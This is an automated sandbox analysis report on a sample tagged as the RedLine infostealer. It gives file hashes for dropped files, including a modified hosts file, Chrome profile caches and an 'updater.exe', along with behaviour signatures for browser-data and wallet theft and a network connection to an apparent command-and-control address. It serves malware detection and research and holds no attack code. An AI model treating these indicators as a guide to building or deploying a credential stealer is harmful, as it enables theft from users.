MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

memory/2300-427-0x0000000019B50000-0x0000000019E32000-memory.dmp

memory/2300-428-0x000007FEF3980000-0x000007FEF431D000-memory.dmp

C:\Windows\system32\drivers\etc\hosts

MD5 2b19df2da3af86adf584efbddd0d31c0
SHA1 f1738910789e169213611c033d83bc9577373686
SHA256 58868a299c5cf1167ed3fbc570a449ecd696406410b24913ddbd0f06a32595bd
SHA512 4a1831f42a486a0ad2deef3d348e7220209214699504e29fdfeb2a6f7f25ad1d353158cd05778f76ef755e77ccd94ce9b4a7504039e439e4e90fa7cde589daa6

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\GPUCache\data_3

MD5 41876349cb12d6db992f1309f22df3f0
SHA1 5cf26b3420fc0302cd0a71e8d029739b8765be27
SHA256 e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c
SHA512 e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\GPUCache\data_2

MD5 0962291d6d367570bee5454721c17e11
SHA1 59d10a893ef321a706a9255176761366115bedcb
SHA256 ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7
SHA512 f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\GPUCache\data_0

MD5 cf89d16bb9107c631daabf0c0ee58efb
SHA1 3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b
SHA256 d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e
SHA512 8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\DawnCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

C:\Program Files\Google\Chrome\updater.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\Cache\Cache_Data\data_0

MD5 62dd3b29676a9d080081b4c165b838d5
SHA1 7930652efbb47ff8673a57f68721a08f24042327
SHA256 0bcd45445c5d1f8747a7c2fe7ea70481bd465bd32eaccef8d0471a4c648ffba4
SHA512 881e4b5c97f0fbb7a85c5ff0f6a591a6522ca7c5cdb4fe98e6e5b7f753c70cc4c3708f5fb04e42f11e6f16a3fd0cbe8545481c477d138c5d2fa28c822db55394

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\Cache\Cache_Data\f_000002

MD5 eb723177494d2a7ab37d1656193bdde4
SHA1 3a15a91bfa96872c8c76dab5e2962a50471020e9
SHA256 ea3faa1f4bfd9dfb46fd7a04f7291a55a5c49801150742f58b1dc0289fe87a81
SHA512 e56f146ae7dcbef2729d106ed7c4ffe7ccb816a5a8e08a43dc36790bcaf5782cb5e1d4c1f28407bcd7e6bedf6d96c17b7a4a1449fc503130a6add6dcca6928e8

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\Cache\Cache_Data\data_3

MD5 f74a3111e7fb98fcf534f2a6335966dc
SHA1 f12fa2b01234619c89639ed16a70febb76339980
SHA256 b19b16a827450528c6d8aeeb71b9b0432a2c6e731e094e6287a37c081107a9bb
SHA512 ab9a80c0c26c509d4a8c66524db54ce5f3ef33b8f13fbdf797482d03d58abcefbb7cd816c98bd36d794a97daec8004c1e96e3e82c22c57bd20d283d221a650e3

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\Cache\Cache_Data\data_2

MD5 eb4af17f64c6ee43d0d2c4b46e97af74
SHA1 fe544bc550e7a2834432ca1eac44a120b0a0f44b
SHA256 3177c16884751aac02c0e70aaa64f5acc45066f0d0521742ec0a0db4135531e3
SHA512 99f9d4a64c85cf48615ec38a3ba04af78a3e3553d1bd6dd4c62b343b1ab3dc3cd9159a71cebebce4e4eaff568e26ba5b7c518c12703a49c3f367c89ea004c0c0

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\Cache\Cache_Data\data_1

MD5 67223050889282a4d4945dfa19ebc7c6
SHA1 e3a13041fd90228840287aef43828c37c9df87da
SHA256 53f7d56bc43fa646c5b3be3d0cf14922707a3c82cea9841f645f05a69e9fbc3e
SHA512 a9e8a80109f7b88044e42141a2ebb2b7b6fdd1f83df1ca78048f8de2967a1a92f70e464deb8910c555ad4bf5bfc8352f53b1218b1eac62b7714805d25b648815

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\chrome_debug.log

MD5 1503d8c4fbd3e2eb92b4d891fc715538
SHA1 b5bf2ef00a1a7ca3e6b3f0531edd61b4362b693e
SHA256 f64c320ab33ad1f8a842e888e670eac01885d430ac4b89213c3e47bb18c5b4ba
SHA512 fa0c96daf560f679bd2a755d8668d7b8bd5ac142f4c644475f2687228b907246f33a0d4adb4d7920ad97fa59259d0490a6e2a0192584aab3e38240e1f3d2f04f

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Crashpad\settings.dat

MD5 0e3044b23d1fa4457d11bb20acc7f0f8
SHA1 0afaf2659f70fe1185755f909c85ab82caff0de2
SHA256 de50b50b12f2844df566eee05df76964230422505fa30424b0bffd5afe868228
SHA512 a57c2b5355062ec2f21d942e36aaded4b8c0996a5d8ce1a62396f9be2d0fa66391ea473e9e65268dfc5fcaa19300fa158c53e5bd7b6fd160d662a42b044cd847

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\DevToolsActivePort

MD5 b42df24cadb5265cd4bd266b67b236ff
SHA1 6d09d9795bf0bafaffbfccb37fe050b199e09e4d
SHA256 82277b27fa484b19953618dc9f5a9b3a2a679dcf7d461845f1f5b2c487f707d7
SHA512 7048176e21c69acb3aa12bc247e3833c6bd5755cec52f19b9fc7714b92dd68d368459b02cce5badb73f4290f79dfbd8012a7f825f39731e7994b6f6ad3d81750

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\Code Cache\js\03c93927cb3db117_0

MD5 1962a1c420f3c8c192b96e7cb4f60afe
SHA1 55f81b611c273e3d09b379baf327aeb1f835d5a2
SHA256 5cd3a5c785dc927090438d8fc7bdc0b18d9cc5f0cb119a4f9fc77262af65f343
SHA512 af3eafb626768b42f0e0c323d637307d5a3f048ae6e717bc8b44709b20e15902dd94f00424acd88d67a653e63c9fd0e2e93947b338cd679edce88aeeb82ff1a2

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\Code Cache\js\5ddeaca7fe64ca95_0

MD5 18d2c3c4aa856ae246c286a07cd37567
SHA1 16d50babe2825c58ed789a74979e8fe05045af81
SHA256 76e7463c80d26881e179f4c35f7e5e51450399b3d8b2929414ba00e1cc6376f0
SHA512 844ae5325fc26a944d9e9cf1490375432febef2105dcf67a1a32632385b043f0ff354bdbaf0d71de7c48f8fcd491eeffd979aa5fbe7729d3fed915d09e49b958

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\Code Cache\js\5b76df05a935e848_0

MD5 607da4e0e9ebaf5856eedfa90a3cdb3c
SHA1 2ddf9e672f8064d75513db47d53376bf175226ec
SHA256 352cdb426922d7a077019a05f161fdc1fbae895d8714f6967fb5996e81dddb90
SHA512 1e66f2ba13d21099b345e29acb282b9603027eecb561823f62690446f459b1f0cb5c7021c20abd372dd25ee34612f3f5a40ab5166627569eae0e2cb8008dc260

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\Code Cache\js\54cb805dcd317636_0

MD5 f8dab46f36aedb4223192566159adb6d
SHA1 b409ac62b9a27a1e600d57a68415ff34092656af
SHA256 7918444873706d39a7cdb31b0e2baff7962f5082d2990aed38539680d70fd31f
SHA512 eb63d30928965bcfa6597aa21f0cc5915480bbdd34876688061f6b1ae41a9d1e7a755157848da55664e9a52100caecef60867d964be394d1e06efb8fa41e49d8

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\Code Cache\js\474aa3bf634a0814_0

MD5 769668fdcded9526f57e0e9249e47af8
SHA1 60f43098064f555f5fb3e8480390805a20732e92
SHA256 2ed9c7a94f7fde9499fdb1e4fbbc286a094a85fc0def04442157d7a239296f45
SHA512 f38f7b0bdc77f230d2f6e827ada63f53c7ce5b40eb98f5bb1fe66bc7e6fdc732e291eb2af37945f66d144796d2d91d6d03614c8d14834228ee0987f3967e3c68

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\Code Cache\js\30dea7dd8c4c2a2b_0

MD5 a07bf8aa73c968bc953a2131144daa44
SHA1 496f9735c2240b52b6a8ed7e5e578fe65330f3c0
SHA256 61be7055b770d86fb47e02b7656a55f1e1c50497399adcd68f037bc549910a34
SHA512 af97f47d360ed32e15555dbbe3ff052fc1dd9d582ad3105fc8a2f5c67906e6c53ccd91e762eb56fb077f312604437edc56f06a5af289fd08d8d541cf68f55096

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\Code Cache\js\2e64514b9cd267ab_0

MD5 f6e8e771f39e2a246e1bbca764b3bc46
SHA1 9db86d9ddf92c5f2b766d7c28538d10556145f40
SHA256 4ebdd40c31c8fa163c992bfb082496cf3dd378b44ab8800671fbebc0cddc714d
SHA512 d1cf3ae19d192e3cc6410138690e0854c1d68765d8f5bb4b832ec8c5f468fede25130bc4cc551e23d58a59b130a823ba29812631bfe25508b9de0ed578f595c6

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\Code Cache\js\17e99028d152eccd_0

MD5 e6ece6f275b07679bbce94dd0846c4c4
SHA1 7b957ae35c2b26c71406e15ee4a4d933059093a4
SHA256 0907e13956324811a0ee8e3b3feb3abeb168412888edc84121d6f3dcd04b7466
SHA512 b341971b12d9b46743bc8c4e96c62ce7a0b4cc7c76c91777e5119b3191d18385a1ffe0328d357a7e53d950653d83f7b6137d3d1d8f21eb03d667ec4b4101d5ce

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\Code Cache\js\056093a36a95204b_0

MD5 cc6d9e1bac3582cace262aab7daf65ab
SHA1 39305e504c802a608a3a98f6b055fbdf9ce180a7
SHA256 bef81447cbb6f38cd9902cb87c742e6f7b5add88b245a467cab96d48ef07e729
SHA512 57ae699e033dd8d5bf68942d637529ac77cf79b1d5aaf17fde7f0972f3dbf0ce47e0eefe685de44fb48341e38eb03950f4b21a58b016951f024ac409bb32e037

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\Cache\Cache_Data\index

MD5 5a9b72cea8937c5c18ef576938e400d6
SHA1 6a65f213fb0a4fd6941c4b6d00489fc4a42f69ca
SHA256 54d6688b35939b718fe514d9d9652dba6b04dcb120ee21dc37702491ae7ffb4b
SHA512 a31885caadbff3261a7078d7c180009b4fcdd6d3260b1af9a6437337a2a84eea8f4418195e6ff0f18045b4939a2bc8311751a4142ce4fc6b37bb7d68fd38313d

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\Cache\Cache_Data\f_00000c

MD5 f67dde285de5f831537c104e505e2f05
SHA1 9c967dd7e4b45de90af20983e78cbd315f7cc700
SHA256 918122ce975ea0a50f0da079028f0a059129d7fad0aeb7a4a52a13640a80dcae
SHA512 2762d03ab4e317fc1c08077ecf08e4c8f05be73abd18c441b2e4480b4b177c13f51056fce403997b9337739a1a180d114ddcd223109af815e38e046b9baa7845

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\Cache\Cache_Data\f_00000b

MD5 2d52125a96fb5a7227c67848bc18f65c
SHA1 a3593c6d8e3b6b458b6bbc2c6423dc76e30a84a3
SHA256 61f3154c19e46e1989d6fadbfe20835d0c9fc47242dc5828e776e3ec667fda24
SHA512 5f151708007cb474e64e8968b1f6b5e5331c434cc237627c6c5c92d1894d020f476ad88461e35fbf383aa46750a9cdcaf3a2ac8fe90570753c73fcf17ac0cbe6

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\Cache\Cache_Data\f_00000a

MD5 7d75a9eb3b38b5dd04b8a7ce4f1b87cc
SHA1 68f598c84936c9720c5ffd6685294f5c94000dff
SHA256 6c24799e77b963b00401713a1dbd9cba3a00249b9363e2c194d01b13b8cdb3d7
SHA512 cf0488c34a1af36b1bb854dea2decfc8394f47831b1670cab3eed8291b61188484cc8ab0a726a524ecdd20b71d291bcccbc2ce999fd91662aca63d2d22ed0d9f

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\Cache\Cache_Data\f_000009

MD5 c101a8ba729b894927d7d884e4be68a8
SHA1 4bf48f94ff4e50e81c9d83b641af74b3bed580a0
SHA256 544f08482a62485be4acbc443462b01fe16b408b3d154c0cb1ff921a453cee33
SHA512 77483a92abeed799dfb1e782988569875b29eccebfb14e5be353302849ea6f0ac6a6411a72d6da706ec3767a54f12907fd0bfa4646ad4ca1cf4e1e15fbe9a9ed

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\Cache\Cache_Data\f_000008

MD5 6a3bb9c5ba28ee73af6c1b53e281b0cf
SHA1 d96e403c99c1707f82ea29c2c1f134e792c64097
SHA256 2f5adfc38558162578ffe112229f10417fbc4b3df025d153d4e22a0c95177740
SHA512 6c4844f70969938339cb6716a834a79e1a8379459c87b983c2518b9cbb560cb2f101aff980f682989928523be6cdc99bde3bfd8137f9c54a58191b900b580fbf

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\Cache\Cache_Data\f_000007

MD5 9f1c899a371951195b4dedabf8fc4588
SHA1 7abeeee04287a2633f5d2fa32d09c4c12e76051b
SHA256 ba60b39bc10f6abd7f7a3a2a9bae5c83a0a6f7787e60115d0e8b4e17578c35f7
SHA512 86e75284beaff4727fae0a46bd8c3a8b4a7c95eceaf45845d5c3c2806139d739c983205b9163e515f6158aa7c3c901554109c92a7acc2c0077b1d22c003dba54

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\Cache\Cache_Data\f_000006

MD5 32fe4f6c44f67afd758815b62ed06a10
SHA1 e52eb498d560e68aa0c9803ba993bbfdda76800e
SHA256 11a424b982a53cb734c97fa266be0067f086c203cf5b9549e66f1d81fe7cd488
SHA512 ab998d0d95f6ac6702c01c217a034f0353865d609c373225371664fb88c5f047b45c32fd9db3440c2fd2c6fcacdb3a1a8c491b5df6868a1d8d0b05f617f601f7

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\Cache\Cache_Data\f_000005

MD5 effdaa6b3be2d9c9a7afbb9dbfc01491
SHA1 3951180ae088ab3e0deeece4c08c599251cf6ad6
SHA256 21dc237cc35a3c95a1e19d9d79fd65639cdba3e6d0803f47807971aa2a7d060f
SHA512 815ae667d99043f74ec389d9be9a74d8134452090e6d4692882ec947d728b5f6a852b7ec4fd6885e6b3e84cc90abe8fc5aaf3b469056c74803f58e92d0733c37

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\Cache\Cache_Data\f_000004

MD5 21808cd0724524589cd4ec1ce26f6d58
SHA1 fc5cc4cb347ed20389626c58a6de396ef1ac5ada
SHA256 1a7608a326717e18f424991b924d9c7319eb273cc3af432585d95ce8b068ca8d
SHA512 36902ff35a1ed469aa9cab3856b1b0057ca7db8ea4d92ca1d129e68f02eebd5322a4e81aec29a2b1c0c289e2f82df13684ccf0305378878494260c4d4e6caf0d

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\Cache\Cache_Data\f_000003

MD5 a85760e677d33a66159db7acca59cf1a
SHA1 a88c27ae4a2dcf3078e57258912531287820492d
SHA256 f2b878fa60d99ed05ffa4fd136b2ec173e54b92e6da4bcbdf476b522b237410c
SHA512 f6e588a499d59f00941a48e70d03e232b551355bb7317f48251b49e72f5b1e52102b9e66dc4cc5106b4521673bcd8b404990b276dfaf1a4aa771d125cf5327db

Analysis: behavioral2

Detonation Overview

Submitted

2023-08-10 18:28

Reported

2023-08-10 18:30

Platform

win10v2004-20230703-en

Max time kernel

142s

Max time network

147s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe"

Signatures

RedLine

infostealer redline

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe

"C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 126.133.241.8.in-addr.arpa udp
NL 136.244.98.226:33587 tcp
US 8.8.8.8:53 108.211.229.192.in-addr.arpa udp
US 8.8.8.8:53 226.98.244.136.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 153.141.79.40.in-addr.arpa udp

Files

memory/4844-133-0x00000000007A0000-0x00000000007D4000-memory.dmp

memory/4844-134-0x0000000074930000-0x00000000750E0000-memory.dmp

memory/4844-135-0x0000000005870000-0x0000000005E88000-memory.dmp

memory/4844-136-0x0000000005360000-0x000000000546A000-memory.dmp

memory/4844-138-0x0000000005240000-0x0000000005250000-memory.dmp

memory/4844-137-0x0000000005270000-0x0000000005282000-memory.dmp

memory/4844-139-0x00000000052D0000-0x000000000530C000-memory.dmp

memory/4844-140-0x00000000055E0000-0x0000000005656000-memory.dmp

memory/4844-141-0x0000000005700000-0x0000000005792000-memory.dmp

memory/4844-142-0x0000000006930000-0x0000000006ED4000-memory.dmp

memory/4844-143-0x00000000057A0000-0x0000000005806000-memory.dmp

memory/4844-144-0x0000000074930000-0x00000000750E0000-memory.dmp

memory/4844-145-0x0000000006650000-0x0000000006812000-memory.dmp

memory/4844-146-0x0000000008B00000-0x000000000902C000-memory.dmp

memory/4844-147-0x0000000006870000-0x00000000068C0000-memory.dmp

memory/4844-148-0x0000000005240000-0x0000000005250000-memory.dmp

memory/4844-150-0x0000000074930000-0x00000000750E0000-memory.dmp